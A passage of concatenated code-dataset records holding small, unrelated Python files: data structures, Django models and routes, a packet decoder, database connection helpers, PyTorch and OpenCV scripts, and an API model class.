context)","repo_name":"ifspcodelab/centro-memoria-ifsp-2020","sub_path":"centro_memoria/centro_memoria/eventos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5803882851","text":"#!/usr/bin/env python3\n\n\"\"\"Implements disjoint-set data structures (so-called union-find data structures).\n\nVerification: [Union Find](https://judge.yosupo.jp/submission/11774)\n\"\"\"\n\n\nclass UnionFind(object):\n \"\"\"A simple implementation of disjoint-set data structures.\n \"\"\"\n\n\n def __init__(self, number_of_nodes):\n \"\"\"Create a disjoint-data structure with `number_of_nodes` nodes.\n \"\"\"\n self.par = list(range(number_of_nodes))\n self.rank = [0] * number_of_nodes\n\n def root(self, node):\n \"\"\"Returns the root of node #`node`.\n \"\"\"\n if self.par[node] == node:\n return node\n else:\n r = 
self.root(self.par[node])\n self.par[node] = r\n return r\n\n def in_the_same_set(self, node1, node2):\n \"\"\"See if the given two nodes #`node1` and #`node2` are in the same set.\n \"\"\"\n return self.root(node1) == self.root(node2)\n\n def unite(self, node1, node2):\n \"\"\"Unite the set containing node #`node1` and the other set containing node #`node2`.\n \"\"\"\n x = self.root(node1)\n y = self.root(node2)\n if x != y:\n if self.rank[x] < self.rank[y]:\n x, y = y, x\n self.par[y] = x\n if self.rank[x] == self.rank[y]:\n self.rank[x] += 1\n","repo_name":"hamukichi/SunflowerSeeds","sub_path":"library/python/data-structure/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35511812443","text":"# Author:GaoYuCai\n# Property method: turns a method into a static attribute\nclass Flight(object):\n def __init__(self,name):\n self.name=name\n def cheching_status(self):\n print(\"checking flight %s status\"%self.name)\n return 1\n @property\n def fright_status(self):\n status=self.cheching_status() # key point\n if status==0:\n print(\"flight got canceled...\")\n elif status==1:\n print(\"flight is arrived...\")\n elif status==2:\n print(\"flight has departured already...\")\n else:\n print(\"Cannot confirm the flight status...please check later\")\n\nf=Flight(\"CA980\")\nf.fright_status\n","repo_name":"gaoyucai/Python_Project","sub_path":"Python_day7/属性方法_e.py","file_name":"属性方法_e.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40282530033","text":"from django.db import migrations, models\nimport django.db.models.deletion\nimport ngos.models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Level',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('key', models.CharField(default=ngos.models.generate_ngo_key, max_length=4, unique=True)),\n ('rank', models.IntegerField()),\n ('is_active', models.BooleanField(blank=True, default=True)),\n ('mr_in', models.CharField(max_length=50)),\n ('en_in', models.CharField(max_length=50)),\n ('creation_time', models.DateTimeField(auto_now_add=True)),\n ('last_modification_time', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'db_table': 'levels',\n },\n ),\n migrations.CreateModel(\n name='NGO',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('key', models.CharField(default=ngos.models.generate_ngo_key, max_length=4, unique=True)),\n ('name', models.CharField(max_length=100, unique=True)),\n ('address', models.CharField(max_length=200)),\n ('logo', models.CharField(blank=True, max_length=200, null=True)),\n ('description', models.CharField(blank=True, max_length=200, null=True)),\n ('is_active', models.BooleanField(blank=True, default=True)),\n ('creation_time', models.DateTimeField(auto_now_add=True)),\n ('last_modification_time', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'db_table': 'ngos',\n },\n ),\n migrations.AddField(\n model_name='level',\n name='ngo',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='ngos.NGO'),\n ),\n migrations.AlterUniqueTogether(\n name='level',\n unique_together={('ngo', 'rank')},\n ),\n 
]\n","repo_name":"maverick-labs-pune/read-server","sub_path":"read/ngos/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1423572925","text":"from django.urls import path\n\nfrom . import views\n\n\napp_name = 'monix'\nurlpatterns = [\n # ex: /monix/\n path('', views.IndexView.as_view(), name='index'),\n path('remove/', views.remove, name='remove'),\n path('add/', views.add, name='add'),\n]\n\n","repo_name":"ClubNix/monix","sub_path":"djangoapp/monix/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"24593091503","text":"with open(\"input.txt\") as f:\n hex_packet = f.readline().rstrip()\n packet = int(hex_packet, 16)\n packet_length = len(hex_packet) * 4\n \n\nn_last = 0\n\ndef next_n_digits(n):\n global packet\n global n_last\n offset = (packet_length - n_last) - n \n ones = (0b1 << n) - 1\n n_digits = (packet & (ones << offset)) >> offset\n n_last += n\n # print(n_digits, n_last)\n return n_digits\n\ndef is_end():\n remaining_bits = packet & ((0b1 << (packet_length - n_last)) - 1)\n return remaining_bits == 0\n \nversion_total = 0\n\ndef gt(nums): return nums[0] > nums[1]\ndef lt(nums): return nums[0] < nums[1]\ndef eq(nums): return nums[0] == nums[1]\ndef prod(nums):\n i = 1\n for num in nums:\n i *= num\n return i\n\ndef parse():\n \n type_to_func = {0: sum, 1: prod, 2: min, 3: max, 5:gt, 6:lt, 7:eq}\n\n global version_total\n version = next_n_digits(3)\n type_id = next_n_digits(3)\n \n version_total += version\n \n if type_id == 4:\n literal = 0\n while not is_end():\n keep_reading = next_n_digits(1)\n next_subpacket = next_n_digits(4)\n\n literal = (literal << 4) | next_subpacket\n if not keep_reading:\n return literal\n \n length_type_id = next_n_digits(1)\n length = 15 if length_type_id == 0 else 11\n \n count_remaining = next_n_digits(length)\n \n parse_list = []\n while not is_end():\n n_initial = n_last\n next_parse = parse()\n parse_list.append(next_parse)\n \n count_remaining -= (n_last - n_initial if length_type_id == 0 else 1)\n \n if count_remaining <= 0 or is_end():\n func = type_to_func[type_id]\n return func(parse_list)\n \nwhile not is_end():\n final_num = parse()\n \n#Part 1\nprint(version_total)\n \n#Part 2\nprint(final_num)\n","repo_name":"Banbadle/advent","sub_path":"16/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34089975188","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport imp\n\nfrom redis import StrictRedis\n\nfrom cassandra.cqlengine import connection\nfrom cassandra.cqlengine.management import sync_table\nfrom cassandra.cqlengine.management import drop_table\n\nfrom models import ShoppingList, User\n\ndef _get_default_config_path():\n for name in (\"prod.py\", \"dev.py\"):\n path = \"config/{}\".format(name)\n if os.path.exists(path):\n return path\n else:\n logger.error(\"Couldn't locate the files in config/\")\n exit(1)\n\n\ndef load_config():\n \"\"\"Load config object for workers.\n\n Look the environment variable called `WORKER_CONFIG`. 
If present\n load the python file else look for `prod.py`, `dev.py` in the order.\n If both are missing quit.\n\n `WORKER_CONFIG` can be of form `config/prod.py` or `config.prod.py`.\n \"\"\"\n path = os.environ.get('WORKER_CONFIG')\n if not path:\n path = _get_default_config_path()\n\n mod_name, file_ext = os.path.splitext(os.path.split(path)[-1])\n config = imp.load_source(mod_name, path)\n return config\n\ndef _set_env_vars(config):\n for k, v in config.__dict__.items():\n if isinstance(v, (int, basestring)):\n os.environ[k] = unicode(v)\n\ndef _setup_cassandra(hosts, keyspace):\n \"\"\"Setup connection to cassandra nodes.\n\n This function needs to be called before making any queries.\n\n :param hosts `list`: list of hosts to connect to.\n :param keyspace `unicode`: name of the keyspace to connect.\n \"\"\"\n if not isinstance(hosts, list):\n raise ValueError(\"hosts only accepts list of ips.\")\n connection.setup(hosts=hosts, default_keyspace=keyspace,\n protocol_version=3)\n\ndef setup_connections(config):\n \"\"\"Set connection to Cassandra\n \"\"\"\n keyspace = config.CASSANDRA_KEYSPACE\n hosts = config.CASSANDRA_HOSTS\n _setup_cassandra(hosts=hosts, keyspace=keyspace)\n _set_env_vars(config)\n sync_tables()\n\n\ndef get_redis_client(host='localhost', port=6379, db=0):\n \"\"\"Create Redis Client connection.\n \"\"\"\n host = os.environ.get('REDIS_HOST') or host\n port = os.environ.get('REDIS_PORT') or port\n return StrictRedis(host=host, port=port, db=db)\n\n\n# Helper methods for tests\ndef sync_tables():\n \"\"\"Sync all models to tables.\n \"\"\"\n sync_table(ShoppingList)\n sync_table(User)\n\ndef drop_tables():\n \"\"\"Drop all tables in the keyspace.\n\n Note: Use this with care!.\n \"\"\"\n drop_table(ShoppingList)\n drop_table(User)\n","repo_name":"ramaprv/flask-cassandra","sub_path":"app/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"14622711495","text":"from torch.utils.data import Dataset\r\nimport numpy as np\r\nimport os\r\nimport h5py\r\nimport torch\r\n\r\ndef remove_zero(data):\r\n idxs = []\r\n for i in range(len(data)):\r\n if data[i].mean() == 0.0:\r\n idxs.append(i)\r\n data = np.delete(data, idxs, 0)\r\n return data\r\n\r\nclass NumDataset(Dataset):\r\n\r\n def __init__(self, args):\r\n\r\n i = 0\r\n n = 0\r\n self.window_size = args.window_size\r\n results = []\r\n self.results2 = []\r\n self.labels = []\r\n print('hdf5 files preprocessing... start')\r\n for labelname in sorted(os.listdir(args.path)):\r\n for filename in sorted(os.listdir(args.path + labelname + '/')):\r\n print(n+1, labelname,'completed !')\r\n n = n + 1\r\n\r\n with h5py.File(args.path + labelname + '/' + filename, \"r\") as f:\r\n data = np.array(list(f[\"pressure\"]))\r\n data = remove_zero(data)\r\n length = len(data)\r\n\r\n data = data.reshape(length, -1)\r\n\r\n for a in range(length - args.window_size):\r\n self.results2.append(data[a:a + args.window_size, :])\r\n self.labels.append(i)\r\n\r\n results.append(data)\r\n\r\n i = i + 1\r\n\r\n self.results2 = torch.tensor(self.results2)\r\n print('hdf5 files preprocessing... 
end')\r\n self.labels = torch.tensor(self.labels)\r\n\r\n def __len__(self):\r\n num_of_idx = len(self.results2) - self.window_size\r\n return num_of_idx\r\n\r\n def __getitem__(self, idx):\r\n idx = idx + 1\r\n X = self.results2[idx]\r\n y = self.labels[idx]\r\n\r\n return X, y","repo_name":"stan5dard/FootGesture","sub_path":"carpet_dataset.py","file_name":"carpet_dataset.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34516975125","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\n\n\n# Create your views here.\n# Define the home view, used as the site landing page\ndef home(req):\n Url = 'http://' + req.get_host() + req.path\n \n text = 'Hello, guest! | Log in'\n username = req.COOKIES.get('username', '')\n if username != '':\n text = 'Hello, {0} | Log out'.format(username)\n \n res = HttpResponse(text) \n res.set_cookie('jump_url', Url, 3600)\n \n return res # try the plain output first\n \n # req.set_cookie('host',Url,3600)\n","repo_name":"lrbmx/xb_blog","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14532741675","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\nimport cv2\nimport numpy as np\nfrom tqdm import *\n\ndef show(res,name,K=5.0):\n\tres = (res-res.min())/(res.max()-res.min())\n\tres = torch.clamp(res,0.0,1.0/K)*K\n\tres = res[0,:,:,:].cpu().permute(1,2,0).numpy()*255\n\tcv2.imshow(name,res.astype(np.uint8))\n\t\t\n\nclass Dewarp(nn.Module):\n\tdef __init__(self,maxDist = 7):\n\t\tsuper(Dewarp,self).__init__()\n\t\tself.maxDist = maxDist\n\t\tself.ks = 11\n\t\n\tdef forward(self,A,B):\n\t\tD = self.maxDist\n\t\tA_pad = F.pad(A,[D,D,D,D])\n\t\tcx,cy = D,D\n\t\t_,_,H,W = B.size()\t#A.size()==B.size()\n\t\tres = None\n\t\tweight_ = None\n\t\tfor dx in tqdm(range(-D+1,D)):\n\t\t\tfor dy in range(-D+1,D):\n\t\t\t\tpx,py = cx+dx,cy+dy\n\t\t\t\ttmpRes = torch.norm(A_pad[:,:,py:py+H,px:px+W]-B,p=2,dim=1).unsqueeze(1)\n\t\t\t\tweight = F.avg_pool2d(tmpRes, self.ks, stride=1, padding=self.ks//2)\n\t\t\t\t#tmpRes = weight * tmpRes\n\t\t\t\tif weight_ is None or res is None:\n\t\t\t\t\tweight_ = weight\n\t\t\t\t\tres = tmpRes\n\t\t\t\telse:\n\t\t\t\t\tmask = weight_ >= weight \n\t\t\t\t\tmask_ = weight[0,:,:,:].cpu().permute(1,2,0).numpy()*255\n\t\t\t\t\t#cv2.imshow('mask',mask_.astype(np.uint8))\n\t\t\t\t\t\n\t\t\t\t\tres[mask] = tmpRes[mask]\n\t\t\t\t\tweight_[mask] = weight[mask]\n\t\t\t\tres = res.detach()\n\t\t\t\tres_ = (res-res.min())/(res.max()-res.min())\n\t\t\t\ttmpRes= (tmpRes-tmpRes.min())/(tmpRes.max()-tmpRes.min())\n\t\t\t\tres_ = res_[0,:,:,:].cpu().permute(1,2,0).numpy()*255\n\t\t\t\ttmpRes = tmpRes[0,:,:,:].cpu().permute(1,2,0).numpy()*255\n\t\t\t\tcv2.imshow('Nowres',res_.astype(np.uint8))\n\t\t\t\tcv2.imshow('Tmpres',tmpRes.astype(np.uint8))\n\t\t\t\tcv2.waitKey(-1)\n\t\t\t\tweight_ = weight_.detach()\n\t\tres = F.max_pool2d(-res, 3, stride=1, padding=1)\n\t\tres = -res\n\t\t#return torch.mean(torch.abs(A-B),dim=1).unsqueeze(1)\n\t\t#return torch.norm(A-B,p=2,dim=1).unsqueeze(1)\n\t\treturn res\n\nif __name__ == '__main__':\n\tA = cv2.imread('A2.jpg').astype(np.float32)\n\tB = cv2.imread('B2.jpg').astype(np.float32)\n\t#cv2.imshow('A',A.astype(np.uint8))\n\t#cv2.imshow('B',B.astype(np.uint8))\n\tA = torch.from_numpy(A).permute(2,0,1)/255.0\n\tB = torch.from_numpy(B).permute(2,0,1)/255.0\n\tA = 
A.unsqueeze(0).float()\n\tB = B.unsqueeze(0).float()\n\n\tmodel = Dewarp(7)\n\tres = model(B,A)\n\tshow(res,'res')\n\tcv2.waitKey(-1)\n\n\n\n\n","repo_name":"bj80heyue/PCB_Defect_Detection_GUI","sub_path":"data/dewarp.py","file_name":"dewarp.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"10531423245","text":"import cv2\nimport time\n\n# Stop Sign Cascade Classifier xml\nstop_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_stop_sign.xml')\n# No entry Sign Cascade Classifier xml\nno_entry_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_no_entry_sign.xml')\n# Stop Sign Cascade Classifier xml\nyield_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_yield_sign_v2.xml')\n# One way Sign Cascade Classifier xml\none_way_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_one_way_sign.xml')\n# Parking Sign Cascade Classifier xml\nparking_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_park2.xml')\n# Crosswalk Sign Cascade Classifier xml\ncrosswalk_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_crosswalk_sign_v2.xml')\n# Roundabout Sign Cascade Classifier xml\nroundabout_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_v1.xml')\n\ncap = cv2.VideoCapture(0)\n#cap.set(4, 480)\n#cap.set(3, 360)term\n#time.sleep(5)\n\nwhile cap.isOpened():\n _, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n stop_sign_scaled = stop_sign.detectMultiScale(gray, 1.3, 5)\n no_entry_sign_scaled = no_entry_sign.detectMultiScale(gray, 1.2, 5)\n yield_sign_scaled = yield_sign.detectMultiScale(gray, 1.2, 5)\n one_way_sign_scaled = one_way_sign.detectMultiScale(gray, 1.3, 5)\n parking_sign_scaled = parking_sign.detectMultiScale(gray, 1.3, 5)\n crosswalk_sign_scaled = crosswalk_sign.detectMultiScale(gray, 1.2, 5)\n round_sign_scaled = roundabout_sign.detectMultiScale(gray, 1.3, 5)\n\n # # Detect the stop sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in stop_sign_scaled:\n # # Draw rectangle around the stop sign\n # stop_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Stop Sign\" on bottom of rectangle\n # stop_sign_text = cv2.putText(img=stop_sign_rectangle, text=\"Stop Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n\n # # Detect the no entry sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in no_entry_sign_scaled:\n # # Draw rectangle around the no entry sign\n # no_entry_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"No entry Sign\" on bottom of rectangle\n # no_entry_sign_text = cv2.putText(img=no_entry_sign_rectangle, text=\"No entry Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n # Detect the yield sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in yield_sign_scaled:\n # # Draw rectangle around the yield sign\n # yield_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Yield Sign\" on bottom of rectangle\n # yield_sign_text = cv2.putText(img=yield_sign_rectangle, text=\"Yield Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n # # 
Detect the one_way sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in one_way_sign_scaled:\n # # Draw rectangle around the one way sign\n # one_way_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Onw waySign\" on bottom of rectangle\n # one_way_sign_text = cv2.putText(img=one_way_sign_rectangle, text=\"One way Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n # # Detect the parking sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in parking_sign_scaled:\n # # Draw rectangle around the parking sign\n # parking_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Parking\" on bottom of rectangle\n # parking_sign_text = cv2.putText(img=parking_sign_rectangle, text=\"Parking Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n #\n # # Detect the crosswalk sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in crosswalk_sign_scaled:\n # # Draw rectangle around the crosswalk sign\n # crosswalk_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Crosswalk\" on bottom of rectangle\n # crosswalk_sign_text = cv2.putText(img=crosswalk_sign_rectangle, text=\"Crosswalk Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n # Detect the crosswalk sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n for (x,y,w,h) in round_sign_scaled:\n # Draw rectangle around the crosswalk sign\n round_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # Write \"Crosswalk\" on bottom of rectangle\n round_sign_text = cv2.putText(img=round_sign_rectangle, text=\"Roundabout Sign\", org=(x, y+h+30),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n\n cv2.imshow(\"img\", img)\n\n key = cv2.waitKey(30)\n if key == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break","repo_name":"EshginGuluzade/bfmc_private","sub_path":"detection2.py","file_name":"detection2.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34409310470","text":"def anpai():\n weekday = { }#定义一个空的字典\n while 1:\n ifend = input(\"【输入【1】选择周末安排,输入【0】退出程序:】\\n\")\n if ifend == '1':\n print(\"【请开始规划你们的周末吧:】\\n\")\n else:\n return \n\n\n print(\"--------------安排周六--------------\\n\")\n yueliupengfei = input(\"【这周是否约刘鹏飞:】\\n(如果是输入1,否则0)\\n\")\n\n if yueliupengfei == '1':\n weekday[\"周六:\"] = \"和小刘小两口约起来!\"\n print(\"周六:和小刘小两口约起来!\\n\")\n elif yueliupengfei == '0':\n weekday[\"周六:\"] = \"周六俩人待家里\"\n print(\"周六:俩人待家里\\n\")\n\n print(\"--------------安排周天--------------\\n\")\n\n yuepengyou = input(\"【沙酱是否约朋友:】\\n(如果是输入1,否则0)\\n\")\n\n if yuepengyou == '1':\n weekday[\"周日:\"] = \"沙酱找朋友玩,栋酱回学校!\"\n print(\"周日:沙酱找朋友玩,栋酱回学校!\\n\")\n elif yuepengyou == '0':\n weekday[\"周日:\"] = \"周六俩人待家里!\"\n print(\"周日:周六俩人待家里!\\n\")\n \n\n #输出字典,将周末的安排一起输入\n staday = \"周六\" + weekday[\"周六:\"] + \"\\n\"\n sunday = \"周日\" + weekday[\"周日:\"] + \"\\n\"\n print(\"------------周末安排总结------------\\n\")\n print(staday)\n print(sunday)\n 
\n\nprint(\"开启沙酱和栋酱的周末之旅吧!!!\\n\")\nprint(\"--------------------------------------\\n\")\nanpai()","repo_name":"ADdongdong/08_CPP_and_C_project","sub_path":"01_Linux/21_process/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73423584392","text":"import datetime\nfrom typing import Any, Dict, List, Type, TypeVar, Union\n\nimport attr\nfrom dateutil.parser import isoparse\n\nfrom ..models.models_ssl_endpoint_history_response_certificate_model import (\n ModelsSSLEndpointHistoryResponseCertificateModel,\n)\nfrom ..models.models_ssl_endpoint_history_response_job_type import ModelsSSLEndpointHistoryResponseJobType\nfrom ..models.models_ssl_endpoint_history_response_probe_type import ModelsSSLEndpointHistoryResponseProbeType\nfrom ..models.models_ssl_endpoint_history_response_status import ModelsSSLEndpointHistoryResponseStatus\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"ModelsSSLEndpointHistoryResponse\")\n\n\n@attr.s(auto_attribs=True)\nclass ModelsSSLEndpointHistoryResponse:\n \"\"\"\n Attributes:\n history_id (Union[Unset, str]): Example: 00000000-0000-0000-0000-000000000000.\n endpoint_id (Union[Unset, str]): Example: 00000000-0000-0000-0000-000000000000.\n audit_id (Union[Unset, int]):\n timestamp (Union[Unset, datetime.datetime]):\n status (Union[Unset, ModelsSSLEndpointHistoryResponseStatus]):\n job_type (Union[Unset, ModelsSSLEndpointHistoryResponseJobType]):\n probe_type (Union[Unset, ModelsSSLEndpointHistoryResponseProbeType]):\n reverse_dns (Union[Unset, str]):\n history_certificates (Union[Unset, List[ModelsSSLEndpointHistoryResponseCertificateModel]]):\n \"\"\"\n\n history_id: Union[Unset, str] = UNSET\n endpoint_id: Union[Unset, str] = UNSET\n audit_id: Union[Unset, int] = UNSET\n timestamp: Union[Unset, datetime.datetime] = UNSET\n status: Union[Unset, ModelsSSLEndpointHistoryResponseStatus] = UNSET\n job_type: Union[Unset, ModelsSSLEndpointHistoryResponseJobType] = UNSET\n probe_type: Union[Unset, ModelsSSLEndpointHistoryResponseProbeType] = UNSET\n reverse_dns: Union[Unset, str] = UNSET\n history_certificates: Union[Unset, List[ModelsSSLEndpointHistoryResponseCertificateModel]] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n history_id = self.history_id\n endpoint_id = self.endpoint_id\n audit_id = self.audit_id\n timestamp: Union[Unset, str] = UNSET\n if not isinstance(self.timestamp, Unset):\n timestamp = self.timestamp.isoformat()[:-6]+'Z'\n\n status: Union[Unset, int] = UNSET\n if not isinstance(self.status, Unset):\n status = self.status.value\n\n job_type: Union[Unset, int] = UNSET\n if not isinstance(self.job_type, Unset):\n job_type = self.job_type.value\n\n probe_type: Union[Unset, int] = UNSET\n if not isinstance(self.probe_type, Unset):\n probe_type = self.probe_type.value\n\n reverse_dns = self.reverse_dns\n history_certificates: Union[Unset, List[Dict[str, Any]]] = UNSET\n if not isinstance(self.history_certificates, Unset):\n history_certificates = []\n for history_certificates_item_data in self.history_certificates:\n history_certificates_item = history_certificates_item_data.to_dict()\n\n history_certificates.append(history_certificates_item)\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if history_id is not UNSET:\n field_dict[\"HistoryId\"] = history_id\n if 
endpoint_id is not UNSET:\n field_dict[\"EndpointId\"] = endpoint_id\n if audit_id is not UNSET:\n field_dict[\"AuditId\"] = audit_id\n if timestamp is not UNSET:\n field_dict[\"Timestamp\"] = timestamp\n if status is not UNSET:\n field_dict[\"Status\"] = status\n if job_type is not UNSET:\n field_dict[\"JobType\"] = job_type\n if probe_type is not UNSET:\n field_dict[\"ProbeType\"] = probe_type\n if reverse_dns is not UNSET:\n field_dict[\"ReverseDNS\"] = reverse_dns\n if history_certificates is not UNSET:\n field_dict[\"HistoryCertificates\"] = history_certificates\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n history_id = d.pop(\"HistoryId\", UNSET)\n\n endpoint_id = d.pop(\"EndpointId\", UNSET)\n\n audit_id = d.pop(\"AuditId\", UNSET)\n\n _timestamp = d.pop(\"Timestamp\", UNSET)\n timestamp: Union[Unset, datetime.datetime]\n if isinstance(_timestamp, Unset):\n timestamp = UNSET\n else:\n timestamp = isoparse(_timestamp)\n\n _status = d.pop(\"Status\", UNSET)\n status: Union[Unset, ModelsSSLEndpointHistoryResponseStatus]\n if isinstance(_status, Unset):\n status = UNSET\n else:\n status = ModelsSSLEndpointHistoryResponseStatus(_status)\n\n _job_type = d.pop(\"JobType\", UNSET)\n job_type: Union[Unset, ModelsSSLEndpointHistoryResponseJobType]\n if isinstance(_job_type, Unset):\n job_type = UNSET\n else:\n job_type = ModelsSSLEndpointHistoryResponseJobType(_job_type)\n\n _probe_type = d.pop(\"ProbeType\", UNSET)\n probe_type: Union[Unset, ModelsSSLEndpointHistoryResponseProbeType]\n if isinstance(_probe_type, Unset):\n probe_type = UNSET\n else:\n probe_type = ModelsSSLEndpointHistoryResponseProbeType(_probe_type)\n\n reverse_dns = d.pop(\"ReverseDNS\", UNSET)\n\n history_certificates = []\n _history_certificates = d.pop(\"HistoryCertificates\", UNSET)\n for history_certificates_item_data in _history_certificates or []:\n history_certificates_item = ModelsSSLEndpointHistoryResponseCertificateModel.from_dict(\n history_certificates_item_data\n )\n\n history_certificates.append(history_certificates_item)\n\n models_ssl_endpoint_history_response = cls(\n history_id=history_id,\n endpoint_id=endpoint_id,\n audit_id=audit_id,\n timestamp=timestamp,\n status=status,\n job_type=job_type,\n probe_type=probe_type,\n reverse_dns=reverse_dns,\n history_certificates=history_certificates,\n )\n\n models_ssl_endpoint_history_response.additional_properties = d\n return models_ssl_endpoint_history_response\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"Keyfactor/keyfactor-python-client-sdk","sub_path":"kfclient/keyfactor_v_1_client/models/models_ssl_endpoint_history_response.py","file_name":"models_ssl_endpoint_history_response.py","file_ext":"py","file_size_in_byte":6904,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"35745447020","text":"class Solution:\r\n def leastInterval(self, tasks: List[str], n: int) -> int:\r\n # time \r\n time = 0 \r\n queue = deque()\r\n count = Counter(tasks)\r\n t = [ -cnt for cnt in count.values()] \r\n 
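# the counts were negated above because heapq is a min-heap: popping therefore yields the most frequent remaining task first\r\n 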
